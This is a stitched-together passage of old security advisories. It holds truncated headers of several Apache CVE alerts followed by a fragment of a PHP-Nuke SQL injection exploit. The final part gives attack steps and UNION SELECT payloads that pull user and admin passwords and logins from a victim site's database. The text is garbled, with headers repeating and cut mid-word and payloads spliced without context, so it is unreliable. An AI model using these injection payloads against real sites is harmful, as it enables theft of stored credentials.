-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[SecurityReason - Apache (mod_status) Refresh Header - Open Redirector (XSS)]
Author: sp3x
Date:
- - Written: 15.12.2007
- - Public: 15.01.2008
SecurityReason Research
SecurityAlert Id: 50
CVE: CVE-2007-6388
SecurityRisk: Low
Affected Software
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[Apache2 CSRF, XSS, Memory Corruption and Denial of Service Vulnerability ]
Author: sp3x
Date:
- - Written: 06.12.2007
- - Public: 09.01.2008
SecurityReason Research
SecurityAlert Id: 48
CVE: CVE-2007-6420
CVE-2007-6421
CVE-2007-6422
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[SecurityReason - Apache (mod_proxy_ftp) Undefined Charset UTF-7 XSS
Vulnerability]
Author: sp3x
Date:
- - Written: 15.12.2007
- - Public: 10.01.2008
SecurityReason Research
SecurityAlert Id: 49
CVE: CVE-2008-0005
SecurityRisk: Low
Affected
s_temp WHERE
username='$username' At last here now we can say : "Critical SQL
injection " Time to exploit this issue :Go to : http://[victim]/[phpnuke_dir]/modules.php?name=Your_Account&op=new_userAnd fill in all Fields but in Nickname: field enter : ' or 1=1/*The
Re
sword,0,0,0,0,0,0 FROM nuke_users/* -> users
passwords and logins
s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM
nuke_authors/* -> nuke_authors passwords and logins
Exploit :- -
http://securityreason.com/achievement_exploitalert/5
How to